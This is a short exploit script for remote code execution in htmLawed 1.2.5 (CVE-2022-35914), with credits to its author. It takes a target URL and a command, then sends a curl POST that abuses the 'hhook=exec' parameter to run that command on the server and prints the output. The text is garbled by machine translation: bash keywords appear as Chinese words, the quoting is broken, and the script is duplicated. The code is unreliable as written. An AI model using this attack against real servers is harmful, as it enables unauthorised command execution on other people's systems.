#利用标题: htmllawed 1.2.5-远程代码执行(RCE)
#日期: 2024-04-24
#利用作者: Miguel Redondo(又名D4T4S3C)
#供应商homepage3360 https://www.bioinformatics.org/phplabware/internal_utilities/htmlawed
#软件link: https://github.com/kesar/htmlawed
#版本:=1.2.5
#在: Linux上测试
#CVE: CVE-2022-35914
横幅(){
回声'___________ _____ _____ _____ _________________________________
echo'/_ \ \ \//___ | | _ \/_ \ __ \ | /_ |/_ \/| |||
回声'| | \ \//| _ | _____ )| | | | | | __)| _ | _ | __ \ __ \(_)| | | | | | | _'
回声'| | _ \ v/| | __ | ____//| | _ |/////____ | __)| __)\ __,| | __ _ |'
回声'\ __ | \ /| ___ | | _______ | \ /__ | ______ | | _____/____//_/| _ | | _ |'
}
而GetOpts':U:C:'Arg;做
案例$ arg in
u)url=$ optarg;令参数_counter+=1 ;
c)cmd=$ optarg;令参数_counter+=1 ;
ESAC
完毕
如果[-z' $ url'] || [-z'$ cmd'];然后
横幅
echo -e'\ n usage: $ {0} -u url -c cmd \ n'
出口
别的
横幅
echo -e'\ n [+]命令输出:'
fi
curl -s -d'sid=foohhook=exectext=$ {cmd}'-b'sid=foo'$ {url} | egrep'\ nbsp; \ [[0-9]+\]=\'| sed -e's/\ nbsp; \ [[0-9]+\]=\(。*)br \ //\ 1/'
#日期: 2024-04-24
#利用作者: Miguel Redondo(又名D4T4S3C)
#供应商homepage3360 https://www.bioinformatics.org/phplabware/internal_utilities/htmlawed
#软件link: https://github.com/kesar/htmlawed
#版本:=1.2.5
#在: Linux上测试
#CVE: CVE-2022-35914
横幅(){
回声'___________ _____ _____ _____ _________________________________
echo'/_ \ \ \//___ | | _ \/_ \ __ \ | /_ |/_ \/| |||
回声'| | \ \//| _ | _____ )| | | | | | __)| _ | _ | __ \ __ \(_)| | | | | | | _'
回声'| | _ \ v/| | __ | ____//| | _ |/////____ | __)| __)\ __,| | __ _ |'
回声'\ __ | \ /| ___ | | _______ | \ /__ | ______ | | _____/____//_/| _ | | _ |'
}
而GetOpts':U:C:'Arg;做
案例$ arg in
u)url=$ optarg;令参数_counter+=1 ;
c)cmd=$ optarg;令参数_counter+=1 ;
ESAC
完毕
如果[-z' $ url'] || [-z'$ cmd'];然后
横幅
echo -e'\ n usage: $ {0} -u url -c cmd \ n'
出口
别的
横幅
echo -e'\ n [+]命令输出:'
fi
curl -s -d'sid=foohhook=exectext=$ {cmd}'-b'sid=foo'$ {url} | egrep'\ nbsp; \ [[0-9]+\]=\'| sed -e's/\ nbsp; \ [[0-9]+\]=\(。*)br \ //\ 1/'
